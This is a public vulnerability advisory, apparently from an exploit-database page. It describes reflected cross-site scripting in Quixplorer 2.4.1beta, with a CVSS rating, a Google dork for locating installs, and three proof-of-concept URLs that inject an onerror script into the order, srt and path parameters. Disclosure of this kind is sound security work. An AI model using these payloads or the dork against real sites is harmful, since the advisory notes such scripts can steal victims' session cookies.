Quixplorer 2.4.1 Beta Cross Site Scripting

Risk: Low
Local: No
Remote: Yes

# Exploit Title: Reflected XSS in quixplorer-2.4.1beta # Google Dork: intitle:"My Download Server" # Date: 04/24/2018 # Exploit Author: Adriano Marcio Monteiro (@adrianomarcmont) # Exploit Author Site: https://www.brztec.com # Exploit Author E-mail: adriano@brztec.com # Vendor Homepage: http://quixplorer.sourceforge.net/ # Software Link: https://sourceforge.net/projects/quixplorer/files/unstable/2.4.1%20beta/quixplorer-2.4.1beta.zip/download # Version: 2.4.1beta # Tested on: All # CVE : None # CVSS Score: 4.7 Medium # CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N # CVSS Link: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N Quixplorer-2.4.1beta is vulnerable to reflected cross-site scripting, caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. Parameters order, srt and arbitrarily supplied URL parameter are vulnerables. PoC - Proof of Concept http://localhost/quixplorer-2.4.1beta/index.php/r1e9f"><img src=x onerror=prompt(document.domain)> http://localhost/quixplorer-2.4.1beta/index.php?action=post&order=bszop"><img src=x onerror=prompt(document.domain)>&srt=yes&lang=ptbr&do_action=&first=y&toggleAllC=on http://localhost/quixplorer-2.4.1beta/index.php?action=post&order=name&srt=w1ixb"><img src=x onerror=prompt(document.domain)>&lang=ptbr&do_action=&first=y&toggleAllC=on

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com


Back to Top